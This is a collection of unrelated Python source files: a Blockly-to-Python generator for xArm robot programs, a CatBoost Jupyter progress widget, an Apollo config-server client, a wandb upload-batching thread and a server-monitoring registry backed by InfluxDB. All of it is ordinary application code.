def _handle_procedures_ifreturn(self, block, prefix='', arg_map=None):
self._is_insert = True
values = self.get_nodes('value', block)
expression = self.__get_condition_expression(values[0], arg_map=arg_map)
self._append_to_file('{}if {}:'.format(prefix, expression))
expression = self.__get_condition_expression(values[1], arg_map=arg_map)
self._append_to_file('{} return {}'.format(prefix, expression))
self._is_insert = False
def _handle_procedures_callreturn(self, block, prefix='', arg_map=None):
self._handle_procedures_callnoreturn(block, prefix, arg_map=arg_map)
def _handle_variables_set(self, block, prefix='', arg_map=None):
field = self.get_node('field', block).text
value = self.get_node('value', root=block)
expression = self.__get_condition_expression(value, arg_map=arg_map)
# self._append_to_file('{}params[\'variables\'][\'{}\'] = {}'.format(prefix, field, expression))
prefix = self.__check_is_quit(prefix)
if arg_map and field in arg_map:
self._append_to_file('{}{} = {}'.format(prefix, arg_map[field], expression))
else:
self._append_to_file('{}params[\'variables\'][\'{}\'] = {}'.format(prefix, field, expression))
# self._append_to_file('{}if \'{}\' not in locals_keys and \'{}\' in locals():'.format(prefix, field, field))
# self._append_to_file('{} {} = {}'.format(prefix, field, expression))
# self._append_to_file('{}else:'.format(prefix))
# self._append_to_file('{} params[\'variables\'][\'{}\'] = {}'.format(prefix, field, expression))
def _handle_math_change(self, block, prefix='', arg_map=None):
field = self.get_node('field', block).text
value = self.get_node('value', root=block)
shadow = self.get_node('shadow', root=value)
val = self.get_node('field', root=shadow).text
# self._append_to_file('{}params[\'variables\'][\'{}\'] += {}'.format(prefix, field, val))
prefix = self.__check_is_quit(prefix)
if arg_map and field in arg_map:
self._append_to_file('{}{} += {}'.format(prefix, arg_map[field], val))
else:
self._append_to_file('{}params[\'variables\'][\'{}\'] += {}'.format(prefix, field, val))
# self._append_to_file('{}if \'{}\' not in locals_keys and \'{}\' in locals():'.format(prefix, field, field))
# self._append_to_file('{} {} += {}'.format(prefix, field, val))
# self._append_to_file('{}else:'.format(prefix))
# self._append_to_file('{} params[\'variables\'][\'{}\'] += {}'.format(prefix, field, val))
def _handle_controls_repeat_ext(self, block, prefix='', arg_map=None):
value = self.get_node('value', root=block)
# times = self.get_nodes('field', root=value, descendant=True)[0].text
times = self.__get_block_val(value, arg_map=arg_map)
self._append_to_file('{}for i in range(int({})):'.format(prefix, times))
prefix = ' ' + prefix
self._append_to_file('{}if params[\'quit\']:'.format(prefix))
self._append_to_file('{} break'.format(prefix))
statement = self.get_node('statement', root=block)
if statement:
if self._highlight_callback:
self._append_to_file('{}t1 = time.time()'.format(prefix))
self.parse(statement, prefix, arg_map=arg_map)
if self._highlight_callback:
self._append_to_file('{}interval = time.time() - t1'.format(prefix))
self._append_to_file('{}if interval < 0.001:'.format(prefix))
self._append_to_file('{} time.sleep(0.001 - interval)'.format(prefix))
else:
self._append_to_file('{}pass'.format(prefix))
# def handle_controls_for(self, block, prefix=''):
# print(block.attrib.get('disabled', False))
def _handle_controls_whileUntil(self, block, prefix='', arg_map=None):
field = self.get_node('field', root=block)
if field.text == 'WHILE':
value = self.get_node('value', root=block)
expression = self.__get_condition_expression(value, arg_map=arg_map)
self._append_to_file('{}while {} and not params[\'quit\']:'.format(prefix, expression))
elif field.text == 'UNTIL':
value = self.get_node('value', root=block)
expression = self.__get_condition_expression(value, arg_map=arg_map)
self._append_to_file('{}while not {} and not params[\'quit\']:'.format(prefix, expression))
prefix = ' ' + prefix
statement = self.get_node('statement', root=block)
if statement:
if self._highlight_callback:
self._append_to_file('{}t1 = time.time()'.format(prefix))
self.parse(statement, prefix, arg_map=arg_map)
if self._highlight_callback:
self._append_to_file('{}interval = time.time() - t1'.format(prefix))
self._append_to_file('{}if interval < 0.001:'.format(prefix))
self._append_to_file('{} time.sleep(0.001 - interval)'.format(prefix))
else:
self._append_to_file('{}pass'.format(prefix))
def _handle_loop_run_forever(self, block, prefix='', arg_map=None):
self._append_to_file('{}while True:'.format(prefix))
prefix = ' ' + prefix
self._append_to_file('{}if params[\'quit\']:'.format(prefix))
self._append_to_file('{} break'.format(prefix))
statement = self.get_node('statement', root=block)
if statement:
if self._highlight_callback:
self._append_to_file('{}t1 = time.time()'.format(prefix))
self.parse(statement, prefix, arg_map=arg_map)
if self._highlight_callback:
self._append_to_file('{}interval = time.time() - t1'.format(prefix))
self._append_to_file('{}if interval < 0.001:'.format(prefix))
self._append_to_file('{} time.sleep(0.001 - interval)'.format(prefix))
else:
self._append_to_file('{}pass'.format(prefix))
def _handle_loop_break(self, block, prefix='', arg_map=None):
self._append_to_file('{}break'.format(prefix))
def _handle_tool_comment(self, block, prefix='', arg_map=None):
field = self.get_node('field', block)
self._append_to_file('{}# {}'.format(prefix, field.text))
statement = self.get_node('statement', block)
if statement:
self.parse(statement, prefix, arg_map=arg_map)
def _handle_tool_app_comment(self, block, prefix='', arg_map=None):
field = self.get_node('field', block)
self._append_to_file('{}# [APP] {}'.format(prefix, field.text))
statement = self.get_node('statement', block)
if statement:
self.parse(statement, prefix, arg_map=arg_map)
def _handle_tool_remark(self, block, prefix='', arg_map=None):
field = self.get_node('field', block)
self._append_to_file('{}# {}'.format(prefix, field.text))
def _handle_controls_if(self, block, prefix='', arg_map=None):
values = self.get_nodes('value', root=block)
statements = self.get_nodes('statement', root=block)
old_prefix = prefix
has_if = False
for i, value in enumerate(values):
prefix = old_prefix
expression = self.__get_condition_expression(value, arg_map=arg_map)
if not has_if:
has_if = True
self._append_to_file('{}if {}:'.format(prefix, expression))
else:
self._append_to_file('{}elif {}:'.format(prefix, expression))
old_prefix = prefix
prefix = ' ' + prefix
statement = None
for st in statements:
if st.attrib['name'][2:] == value.attrib['name'][2:]:
statement = st
break
if statement:
self.parse(statement, prefix, arg_map=arg_map)
else:
self._append_to_file('{}pass'.format(prefix))
for st in statements:
if st.attrib['name'] == 'ELSE':
if has_if:
self._append_to_file('{}else:'.format(old_prefix))
self.parse(st, old_prefix if not has_if else ' ' + old_prefix, arg_map=arg_map)
break
# value = self.get_node('value', root=block)
# expression = self.__get_condition_expression(value)
# self._append_to_file('{}if {}:'.format(prefix, expression))
# old_prefix = prefix
# prefix = ' ' + prefix
# statement_if = self.get_nodes('statement', root=block, name='DO0')
# statement_else = self.get_nodes('statement', root=block, name='ELSE')
# if statement_if:
# self.parse(statement_if[0], prefix)
# if statement_else:
# self._append_to_file('{}else:'.format(old_prefix))
# self.parse(statement_else[0], prefix)
# else:
# self._append_to_file('{}pass'.format(prefix))
# statement = self.get_node('statement', root=block)
# if statement:
# self.parse(statement, prefix)
# else:
# self._append_to_file('{}pass'.format(prefix))
def __get_condition_expression(self, value_block, arg_map=None):
block = self.get_node('block', value_block)
if block is None:
shadow = self.get_node('shadow', root=value_block)
return self.get_node('field', root=shadow).text
if block.attrib['type'] == 'logic_boolean':
return str(self.get_node('field', block).text == 'TRUE')
elif block.attrib['type'] == 'logic_compare':
op = self._ops.get(self.get_node('field', block).text)
cond_a = 0
cond_b = 0
values = self.get_nodes('value', block)
if len(values) > 0:
cond_a = self.__get_condition_expression(values[0], arg_map=arg_map)
if len(values) > 1:
cond_b = self.__get_condition_expression(values[1], arg_map=arg_map)
return '{} {} {}'.format(cond_a, op, cond_b)
elif block.attrib['type'] == 'logic_operation':
op = self.get_node('field', block).text.lower()
cond_a = False
cond_b = False
values = self.get_nodes('value', block)
if len(values) > 0:
cond_a = self.__get_condition_expression(values[0], arg_map=arg_map)
if len(values) > 1:
cond_b = self.__get_condition_expression(values[1], arg_map=arg_map)
return '{} {} {}'.format(cond_a, op, cond_b)
elif block.attrib['type'] == 'logic_negate':
value = self.get_node('value', root=block)
return 'not ({})'.format(self.__get_condition_expression(value, arg_map=arg_map))
elif block.attrib['type'] == 'gpio_get_digital':
io = self.get_node('field', block).text
return 'arm.get_tgpio_digital({})[{}]'.format(io, 1)
elif block.attrib['type'] == 'gpio_get_analog':
io = self.get_node('field', block).text
return 'arm.get_tgpio_analog({})[{}]'.format(io, 1)
elif block.attrib['type'] == 'gpio_get_controller_digital':
io = self.get_node('field', block).text
return 'arm.get_cgpio_digital({})[{}]'.format(io, 1)
elif block.attrib['type'] == 'gpio_get_controller_analog':
io = self.get_node('field', block).text
return 'arm.get_cgpio_analog({})[{}]'.format(io, 1)
elif block.attrib['type'] == 'gpio_get_ci':
io = self.get_node('field', block).text
return 'params[\'events\'][\'gpio\'].values[\'cgpio\'][\'digital\'][{}] if \'gpio\' in params[\'events\'] else 1'.format(io)
elif block.attrib['type'] == 'gpio_get_co':
io = self.get_node('field', block).text
return 'params[\'events\'][\'gpio\'].values[\'cgpio\'][\'digital_o\'][{}] if \'gpio\' in params[\'events\'] else 0'.format(io)
elif block.attrib['type'] == 'gpio_get_ai':
io = self.get_node('field', block).text
return 'params[\'events\'][\'gpio\'].values[\'cgpio\'][\'analog\'][{}] if \'gpio\' in params[\'events\'] else 0'.format(io)
elif block.attrib['type'] == 'gpio_get_ao':
io = self.get_node('field', block).text
return 'params[\'events\'][\'gpio\'].values[\'cgpio\'][\'analog_o\'][{}] if \'gpio\' in params[\'events\'] else 0'.format(io)
elif block.attrib['type'] == 'gpio_match_controller_digitals_bin':
bin_val = self.get_node('field', block).text
return 'params[\'events\'][\'gpio\'].cgpio_digitals_is_matchs_bin(\'{}\') if \'gpio\' in params[\'events\'] else False'.format(
bin_val)
elif block.attrib['type'] == 'get_suction_cup':
return 'arm.get_suction_cup()[{}]'.format(1)
elif block.attrib['type'] == 'check_air_pump_state':
fields = self.get_nodes('field', root=block)
state = 1 if fields[0].text == 'ON' else 0
timeout = float(fields[1].text)
return 'arm.arm.check_air_pump_state({}, timeout={})'.format(state, timeout)
elif block.attrib['type'] == 'check_bio_gripper_is_catch':
fields = self.get_nodes('field', root=block)
timeout = float(fields[0].text)
return 'arm.arm.check_bio_gripper_is_catch(timeout={}) == True'.format(timeout)
elif block.attrib['type'] == 'check_robotiq_is_catch':
fields = self.get_nodes('field', root=block)
timeout = float(fields[0].text)
return 'arm.arm.check_robotiq_is_catch(timeout={}) == True'.format(timeout)
elif block.attrib['type'] == 'math_number':
val = self.get_node('field', block).text
return val
elif block.attrib['type'] == 'math_arithmetic':
field = self.get_node('field', block).text
values = self.get_nodes('value', block)
if len(values) > 1:
val_a = self.__get_block_val(values[0], arg_map=arg_map)
val_b = self.__get_block_val(values[1], arg_map=arg_map)
if field == 'ADD':
return '({} + {})'.format(val_a, val_b)
elif field == 'MINUS':
return '({} - {})'.format(val_a, val_b)
elif field == 'MULTIPLY':
return '({} * {})'.format(val_a, val_b)
elif field == 'DIVIDE':
return '({} / {})'.format(val_a, val_b)
elif field == 'POWER':
return 'pow({}, {})'.format(val_a, val_b)
elif block.attrib['type'] == 'math_number_property':
field = self.get_node('field', block).text
values = self.get_nodes('value', block)
if len(values) >= 1:
val_a = self.__get_block_val(values[0], arg_map=arg_map)
if field == 'EVEN':
# 偶数
return '{} % 2 == 0'.format(val_a)
elif field == 'ODD':
# 奇数
return '{} % 2 == 1'.format(val_a)
elif field == 'PRIME':
# 质数
return 'gaussian_surface_bug.is_prime({})'.format(val_a)
elif field == 'WHOLE':
return '{} % 1 == 0'.format(val_a)
elif field == 'POSITIVE':
# 正数
return '{} > 0'.format(val_a)
elif field == 'NEGATIVE':
# 负数
return '{} < 0'.format(val_a)
elif field == 'DIVISIBLE_BY':
# 可被整除
if len(values) > 1:
val_b = self.__get_block_val(values[1], arg_map=arg_map)
else:
val_b = 0
return '{} % {} == 0'.format(val_a, val_b)
elif block.attrib['type'] == 'math_random_int':
values = self.get_nodes('value', block)
if len(values) > 1:
val_a = self.__get_block_val(values[0], arg_map=arg_map)
val_b = self.__get_block_val(values[1], arg_map=arg_map)
return 'random.randint({}, {})'.format(val_a, val_b)
elif block.attrib['type'] == 'math_round':
field = self.get_node('field', block).text
values = self.get_nodes('value', block)
if len(values) >= 1:
val_a = self.__get_block_val(values[0], arg_map=arg_map)
if field == 'ROUND':
# 四舍五入
return 'round({})'.format(val_a)
elif field == 'ROUNDUP':
# 上舍入
return 'math.ceil({})'.format(val_a)
elif field == 'ROUNDDOWN':
# 下舍入
return 'math.floor({})'.format(val_a)
elif block.attrib['type'] == 'math_single':
# 算术函数
field = self.get_node('field', block).text
values = self.get_nodes('value', block)
if len(values) >= 1:
val_a = self.__get_block_val(values[0], arg_map=arg_map)
if field == 'ROOT':
# 平方根
return 'math.sqrt({})'.format(val_a)
elif field == 'ABS':
# 绝对值
return 'abs({})'.format(val_a)
elif field == 'NEG':
# 相反数
return '-{}'.format(val_a)
elif field == 'LN':
# ln
return 'math.log({})'.format(val_a)
elif field == 'LOG10':
# log10
return '(math.log({}) / math.log(10))'.format(val_a)
elif field == 'EXP':
# exp
return 'math.exp({})'.format(val_a)
elif field == 'POW10':
# 10的多少次方
return 'math.pow(10, {})'.format(val_a)
elif block.attrib['type'] == 'math_trig':
# 三角函数
field = self.get_node('field', block).text
values = self.get_nodes('value', block)
if len(values) >= 1:
val_a = self.__get_block_val(values[0], arg_map=arg_map)
if field == 'SIN':
return 'math.sin({})'.format(val_a)
elif field == 'COS':
return 'math.cos({})'.format(val_a)
elif field == 'TAN':
return 'math.tan({})'.format(val_a)
elif field == 'ASIN':
return 'math.asin({})'.format(val_a)
elif field == 'ACOS':
return 'math.acos({})'.format(val_a)
elif field == 'ATAN':
return 'math.atan({})'.format(val_a)
elif block.attrib['type'] == 'math_constant':
# 常量
field = self.get_node('field', block).text
if field == 'PI':
return 'math.pi'
elif field == 'E':
return 'math.e'
elif field == 'GOLDEN_RATIO':
return '(1 + math.sqrt(5)) / 2'
elif field == 'SQRT2':
return 'math.sqrt(2)'
elif field == 'SQRT1_2':
return 'math.sqrt(0.5)'
elif field == 'INFINITY':
return 'math.inf'
elif block.attrib['type'] == 'math_modulo':
values = self.get_nodes('value', block)
if len(values) > 1:
val_a = self.__get_block_val(values[0], arg_map=arg_map)
val_b = self.__get_block_val(values[1], arg_map=arg_map)
return '{} % {}'.format(val_a, val_b)
elif block.attrib['type'] == 'math_constrain':
values = self.get_nodes('value', block)
if len(values) > 2:
val_a = self.__get_block_val(values[0], arg_map=arg_map)
val_b = self.__get_block_val(values[1], arg_map=arg_map)
val_c = self.__get_block_val(values[2], arg_map=arg_map)
return 'min(max({}, {}), {})'.format(val_a, val_b, val_c)
# elif block.attrib['type'] == 'math_round':
# pass
elif block.attrib['type'] == 'variables_get':
field = self.get_node('field', block).text
# return '(params[\'variables\'].get(\'{}\', 0) if \'{}\' in locals_keys or \'{}\' not in locals() else {})'.format(field, field, field, field)
if arg_map and field in arg_map:
return '{}'.format(arg_map[field])
else:
return 'params[\'variables\'].get(\'{}\', 0)'.format(field)
elif block.attrib['type'] == 'move_var':
val = self.get_node('field', block).text
return val
elif block.attrib['type'] == 'tool_get_date':
return 'datetime.datetime.now()'
elif block.attrib['type'] == 'tool_combination':
field = self.get_node('field', block).text
values = self.get_nodes('value', block)
var1 = self.__get_condition_expression(values[0], arg_map=arg_map)
var2 = self.__get_condition_expression(values[1], arg_map=arg_map)
return '\'{{}}{{}}{{}}\'.format({}, \'{}\', {})'.format(var1, field, var2)
elif block.attrib['type'] == 'procedures_callreturn':
mutation = self.get_node('mutation', block).attrib['name']
if not mutation:
mutation = '1'
if mutation in self._funcs:
name = self._funcs[mutation]
else:
name = 'function_{}'.format(self.func_index)
args = self.get_nodes('arg', root=self.get_node('mutation', block))
values = self.get_nodes('value', root=block)
if args and values and len(args) == len(values):
return 'MyDef.{}({})'.format(name, ','.join(
[self.__get_condition_expression(val, arg_map=arg_map) for val in values]))
else:
return 'MyDef.{}()'.format(name)
# return 'MyDef.{}()'.format(name)
def __get_block_val(self, block, arg_map=None):
block_v = self.get_node('block', root=block)
if block_v is not None:
val = self.__get_condition_expression(block, arg_map=arg_map)
else:
shadow = self.get_node('shadow', root=block)
val = self.get_node('field', root=shadow).text
return val
if __name__ == '__main__':
blockly = BlocklyTool('C:\\Users\\ufactory\\.UFACTORY\projects\\test\\xarm6\\app\\myapp\local_test_1\\app.xml')
# blockly = BlocklyTool('C:\\Users\\ufactory\\.UFACTORY\projects\\test\\xarm6\\app\\myapp\\app_template\\app.xml')
# blockly = BlocklyTool('C:\\Users\\ufactory\\.UFACTORY\projects\\test\\xarm6\\app\\myapp\\test_gpio\\app.xml')
# blockly = BlocklyTool('C:\\Users\\ufactory\\.UFACTORY\projects\\test\\xarm7\\app\\myapp\\pour_water\\app.xml')
# blockly = BlocklyTool('C:\\Users\\ufactory\\.UFACTORY\projects\\test\\xarm7\\app\\myapp\\233\\app.xml')
import os
target_path = os.path.join(os.path.expanduser('~'), '.UFACTORY', 'app', 'tmp')
if not os.path.exists(target_path):
os.makedirs(target_path)
target_file = os.path.join(target_path, 'blockly_app.py')
blockly.to_python(target_file, arm='192.168.1.145')
|
ipythonwidget.py
|
import os
import csv
import time
from threading import Thread
from IPython.core.display import display, HTML
from traitlets import Unicode, Dict, default
from ipywidgets import DOMWidget, Layout, widget_serialization
class CatboostIpythonWidget(DOMWidget):
_view_name = Unicode('CatboostIpythonWidgetView').tag(sync=True)
_view_module = Unicode('catboost_module').tag(sync=True)
data = Dict({}).tag(sync=True, **widget_serialization)
def __init__(self, train_dir):
super(self.__class__, self).__init__()
self.train_dir = train_dir
@default('layout')
def _default_layout(self):
return Layout(height='500px', align_self='stretch')
def update_widget(self, subdirs=False):
# wait for start train (meta.tsv)
self.init_static()
time.sleep(1.0)
self.update_data(subdirs=subdirs)
display(self)
while self.needUpdate:
self.update_data(subdirs=subdirs)
time.sleep(2.0)
def run_update(self):
thread = Thread(target=self.update_widget, args=())
thread.start()
def get_subdirectories(self, a_dir):
return [{'name': name, 'path': os.path.join(a_dir, name)}
for name in os.listdir(a_dir) if os.path.isdir(os.path.join(a_dir, name))]
def update_data(self, subdirs=False):
data = {}
dirs = [{'name': 'current', 'path': self.train_dir}]
needUpdate = False
if subdirs:
dirs = self.get_subdirectories(self.train_dir)
for dir_info in dirs:
path = dir_info.get('path')
content = self.update_data_from_dir(path)
if not content:
continue
data[path] = {
'path': path,
'name': dir_info.get('name'),
'content': content
}
if not needUpdate:
needUpdate = data[path]['content']['passed_iterations'] < data[path]['content']['total_iterations']
self.data = data
self.needUpdate = needUpdate
def update_data_from_dir(self, path):
data = {
'learn_error': [],
'test_error': [],
'time_left': '',
'meta': []
}
meta_tsv = os.path.join(path, 'meta.tsv')
if os.path.isfile(meta_tsv):
with open(meta_tsv, 'rb') as meta_in:
data['meta'] = {}
for row in list(csv.reader(meta_in, delimiter='\t')):
if not len(row):
continue
if row[0] != 'loss':
data['meta'][row[0]] = row[1]
else:
data['meta'][row[0] + '_' + row[1]] = row[2]
logs = {
'test_error': data['meta']['testErrorLog'] if 'testErrorLog' in data['meta'] else 'test_error.tsv',
'learn_error': data['meta']['learnErrorLog'] if 'learnErrorLog' in data['meta'] else 'learn_error.tsv',
'time_left': data['meta']['timeLeft'] if 'timeLeft' in data['meta'] else 'time_left.tsv'
}
for error_type in logs:
file_path = os.path.join(path, logs[error_type])
if os.path.isfile(file_path):
with open(file_path, 'rb') as f:
data[error_type] = list(csv.reader(f, delimiter='\t'))
passed_test_iterations = len(data['test_error']) - 1
passed_learn_iterations = len(data['learn_error']) - 1
passed_iterations = 0
if (passed_test_iterations > 0 and passed_learn_iterations > 0):
passed_iterations = min(passed_test_iterations, passed_learn_iterations)
elif passed_test_iterations > 0:
passed_iterations = passed_test_iterations
elif passed_learn_iterations > 0:
passed_iterations = passed_learn_iterations
if data['meta'] and data['meta']['iterCount']:
return {
'passed_iterations': passed_iterations,
'total_iterations': int(data['meta']['iterCount']),
'rows': data
}
else:
return None
@staticmethod
def get_static_path(file_name):
return os.path.join(os.path.dirname(__file__), file_name)
def init_static(self):
with open(self.get_static_path('CatboostIpython.css')) as f:
css = f.read()
js = ''
# never use require in your projects
js += 'window.__define = window.define;window.__require = window.require;window.define = undefined;window.require = undefined;'
with open(self.get_static_path('plotly-basic.min.js')) as f:
js += f.read()
js += 'window.define = window.__define;window.require = window.__require;window.__define = undefined; window.__require = undefined;'
with open(self.get_static_path('CatboostIpythonPlotly.js')) as f:
js += f.read()
with open(self.get_static_path('CatboostIpythonInit.js')) as f:
js += f.read()
html = """
<style>
{}
</style>
<script>
{}
</script>
""".format(css, js)
display(HTML(html))
|
apollo_client.py
|
# -*- coding: utf-8 -*-
import json
import logging
import sys
import threading
import time
import requests
class ApolloClient(object):
def __init__(self, app_id, cluster='default', config_server_url='http://localhost:8080', timeout=35):
self.config_server_url = config_server_url
self.appId = app_id
self.cluster = cluster
self.timeout = timeout
self.stopped = False
self._stopping = False
self._cache = {}
self._notification_map = {'application': -1}
# Main method
def get_value(self, key, default_val=None, namespace='application', auto_fetch_on_cache_miss=False):
if namespace not in self._cache:
self._cache[namespace] = {}
logging.getLogger(__name__).info("Add namespace '%s' to local cache", namespace)
# This is a new namespace, need to do a blocking fetch to populate the local cache
if namespace not in self._notification_map:
self._notification_map[namespace] = -1
logging.getLogger(__name__).info("Add namespace '%s' to local notification map", namespace)
self._long_poll()
if key in self._cache[namespace]:
return self._cache[namespace][key]
else:
if auto_fetch_on_cache_miss:
return self._cached_http_get(key, default_val, namespace)
else:
return default_val
# Start the long polling loop. Two modes are provided:
# 1: thread mode (default), create a worker thread to do the loop. Call self.stop() to quit the loop
# 2: eventlet mode (recommended), no need to call the .stop() since it is async
def start(self, use_eventlet=False):
# First do a blocking long poll to populate the local cache, otherwise we may get racing problems
if len(self._cache) == 0:
self._long_poll()
if use_eventlet:
import eventlet
eventlet.spawn(self._listener)
else:
import signal
signal.signal(signal.SIGINT, self._signal_handler)
signal.signal(signal.SIGTERM, self._signal_handler)
signal.signal(signal.SIGABRT, self._signal_handler)
t = threading.Thread(target=self._listener)
t.start()
def stop(self):
self._stopping = True
logging.getLogger(__name__).info("Stopping listener...")
def _cached_http_get(self, key, default_val, namespace='application'):
url = '{}/configfiles/json/{}/{}/{}'.format(self.config_server_url, self.appId, self.cluster, namespace)
r = requests.get(url)
if r.ok:
data = r.json()
self._cache[namespace] = data
logging.getLogger(__name__).info('Updated local cache for namespace %s', namespace)
else:
data = self._cache[namespace]
if key in data:
return data[key]
else:
return default_val
def _uncached_http_get(self, namespace='application'):
url = '{}/configs/{}/{}/{}'.format(self.config_server_url, self.appId, self.cluster, namespace)
r = requests.get(url)
if r.status_code == 200:
data = r.json()
self._cache[namespace] = data['configurations']
logging.getLogger(__name__).info('Updated local cache for namespace %s release key %s: %s',
namespace, data['releaseKey'],
repr(self._cache[namespace]))
def _signal_handler(self, signal, frame):
logging.getLogger(__name__).info('You pressed Ctrl+C!')
self._stopping = True
def _long_poll(self):
url = '{}/notifications/v2'.format(self.config_server_url)
notifications = []
for key in self._notification_map:
notification_id = self._notification_map[key]
notifications.append({
'namespaceName': key,
'notificationId': notification_id
})
r = requests.get(url=url, params={
'appId': self.appId,
'cluster': self.cluster,
'notifications': json.dumps(notifications, ensure_ascii=False)
}, timeout=self.timeout)
logging.getLogger(__name__).debug('Long polling returns %d: url=%s', r.status_code, r.request.url)
if r.status_code == 304:
# no change, loop
logging.getLogger(__name__).debug('No change, loop...')
return
if r.status_code == 200:
data = r.json()
for entry in data:
ns = entry['namespaceName']
nid = entry['notificationId']
logging.getLogger(__name__).info("%s has changes: notificationId=%d", ns, nid)
self._uncached_http_get(ns)
self._notification_map[ns] = nid
else:
logging.getLogger(__name__).warn('Sleep...')
time.sleep(self.timeout)
def _listener(self):
logging.getLogger(__name__).info('Entering listener loop...')
while not self._stopping:
self._long_poll()
logging.getLogger(__name__).info("Listener stopped!")
self.stopped = True
if __name__ == '__main__':
root = logging.getLogger()
root.setLevel(logging.DEBUG)
ch = logging.StreamHandler(sys.stdout)
ch.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
root.addHandler(ch)
client = ApolloClient('pycrawler')
client.start()
if sys.version_info[0] < 3:
v = raw_input('Press any key to quit...')
else:
v = input('Press any key to quit...')
client.stop()
while not client.stopped:
pass
|
step_checksum.py
|
"""Batching file prepare requests to our API."""
import collections
import os
import shutil
import threading
import wandb.util
from wandb.filesync import step_upload
RequestUpload = collections.namedtuple(
"RequestUpload",
(
"path",
"save_name",
"artifact_id",
"copy",
"use_prepare_flow",
"save_fn",
"digest",
),
)
RequestStoreManifestFiles = collections.namedtuple(
"RequestStoreManifestFiles", ("manifest", "artifact_id", "save_fn")
)
RequestCommitArtifact = collections.namedtuple(
"RequestCommitArtifact", ("artifact_id", "finalize", "before_commit", "on_commit")
)
RequestFinish = collections.namedtuple("RequestFinish", ("callback"))
class StepChecksum(object):
def __init__(self, api, tempdir, request_queue, output_queue, stats):
self._api = api
self._tempdir = tempdir
self._request_queue = request_queue
self._output_queue = output_queue
self._stats = stats
self._thread = threading.Thread(target=self._thread_body)
self._thread.daemon = True
def _thread_body(self):
finished = False
while True:
req = self._request_queue.get()
if isinstance(req, RequestUpload):
path = req.path
if req.copy:
path = os.path.join(
self._tempdir.name,
"%s-%s" % (wandb.util.generate_id(), req.save_name),
)
wandb.util.mkdir_exists_ok(os.path.dirname(path))
try:
# certain linux distros throw an exception when copying
# large files: https://bugs.python.org/issue43743
shutil.copy2(req.path, path)
except OSError:
shutil._USE_CP_SENDFILE = False
shutil.copy2(req.path, path)
checksum = None
if req.use_prepare_flow:
# passing a checksum through indicates that we'd like to use the
# "prepare" file upload flow, in which we prepare the files in
# the database before uploading them. This is currently only
# used for artifact manifests
checksum = wandb.util.md5_file(path)
self._stats.init_file(req.save_name, os.path.getsize(path))
self._output_queue.put(
step_upload.RequestUpload(
path,
req.save_name,
req.artifact_id,
checksum,
req.copy,
req.save_fn,
req.digest,
)
)
elif isinstance(req, RequestStoreManifestFiles):
for entry in req.manifest.entries.values():
if entry.local_path:
# This stupid thing is needed so the closure works correctly.
def make_save_fn_with_entry(save_fn, entry):
return lambda progress_callback: save_fn(
entry, progress_callback
)
self._stats.init_file(
entry.local_path, entry.size, is_artifact_file=True
)
self._output_queue.put(
step_upload.RequestUpload(
entry.local_path,
entry.path,
req.artifact_id,
entry.digest,
False,
make_save_fn_with_entry(req.save_fn, entry),
entry.digest,
)
)
elif isinstance(req, RequestCommitArtifact):
self._output_queue.put(
step_upload.RequestCommitArtifact(
req.artifact_id, req.finalize, req.before_commit, req.on_commit
)
)
elif isinstance(req, RequestFinish):
break
else:
raise Exception("internal error")
self._output_queue.put(step_upload.RequestFinish(req.callback))
def start(self):
self._thread.start()
def is_alive(self):
return self._thread.is_alive()
def finish(self):
self._request_queue.put(RequestFinish(None))
|
process.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: leeyoshinari
import time
import json
import threading
import influxdb
from logger import logger, cfg, handle_exception
from request import Request
class Process(object):
def __init__(self):
self.request = Request()
self._slaves = {'ip': [], 'port': [], 'system': [], 'cpu': [], 'mem': [], 'time': [], 'disk': [], 'nic': [],
'network_speed': [], 'disk_size': [], 'mem_usage': [], 'cpu_usage': [], 'disk_usage': []}
# 设置数据库过期时间
conn = influxdb.InfluxDBClient(cfg.getInflux('host'), cfg.getInflux('port'), cfg.getInflux('username'),
cfg.getInflux('password'), cfg.getInflux('database'))
conn.query(f'alter retention policy "autogen" on "{cfg.getInflux("database")}" duration '
f'{cfg.getInflux("expiryTime")}d REPLICATION 1 SHARD DURATION {cfg.getInflux("shardDuration")} default;')
logger.info(f'设置数据过期时间为{cfg.getInflux("expiryTime")}天。')
t = threading.Thread(target=self.check_status, args=()) # 开启线程,检查已经注册的客户端是否在线
t.start()
@property
def slaves(self):
return self._slaves
@slaves.setter
def slaves(self, value):
logger.debug(f'客户端注册数据为{value}')
ip = value['host']
if ip in self._slaves['ip']:
ind = self._slaves['ip'].index(ip)
self._slaves['cpu_usage'][ind] = value['cpu_usage']
self._slaves['mem_usage'][ind] = value['mem_usage']
self._slaves['disk_usage'][ind] = value['disk_usage']
self._slaves['time'][ind] = time.time()
logger.info(f'{ip}服务器已注册')
else:
self._slaves['ip'].append(value['host'])
self._slaves['port'].append(value['port'])
self._slaves['system'].append(value['system'])
self._slaves['cpu'].append(value['cpu'])
self._slaves['mem'].append(value['mem'])
self._slaves['time'].append(time.time())
self._slaves['disk'].append(value['disks'].split(','))
self._slaves['nic'].append(value['nic'])
self._slaves['disk_size'].append(value['disk_size'])
self._slaves['network_speed'].append(value['network_speed'])
self._slaves['cpu_usage'].append((value['cpu_usage']))
self._slaves['mem_usage'].append((value['mem_usage']))
self._slaves['disk_usage'].append((value['disk_usage']))
logger.info(f'{ip}服务器注册成功')
def check_status(self):
"""
检查客户端是否在线,不在线则剔除
:return:
"""
while True:
time.sleep(5)
for i in range(len(self._slaves['ip'])):
if time.time() - self._slaves['time'][i] > 8:
ip = self._slaves['ip'].pop(i)
self._slaves['port'].pop(i)
self._slaves['system'].pop(i)
self._slaves['cpu'].pop(i)
self._slaves['mem'].pop(i)
self._slaves['time'].pop(i)
self._slaves['disk'].pop(i)
self._slaves['nic'].pop(i)
self._slaves['network_speed'].pop(i)
self._slaves['disk_size'].pop(i)
self._slaves['cpu_usage'].pop(i)
self._slaves['mem_usage'].pop(i)
self._slaves['disk_usage'].pop(i)
logger.warning(f"客户端{ip}服务器状态异常,已下线")
break
@handle_exception(is_return=True, default_value=[-1, -1, -1, -1, '-', -1])
def get_gc(self, ip, port, interface):
"""
获取端口的垃圾回收数据,访问地址 http://ip:port/interface
:param ip: 客户端服务器IP
:param port: 客户端启用端口
:param interface: 访问接口名称
:return:
"""
res = self.request.request('get', ip, port, interface)
if res.status_code == 200:
response = json.loads(res.content.decode())
logger.debug(f'获取{ip}服务器的{port}端口的gc数据为{response}')
if response['code'] == 0:
return response['data']
else:
logger.error(response['msg'])
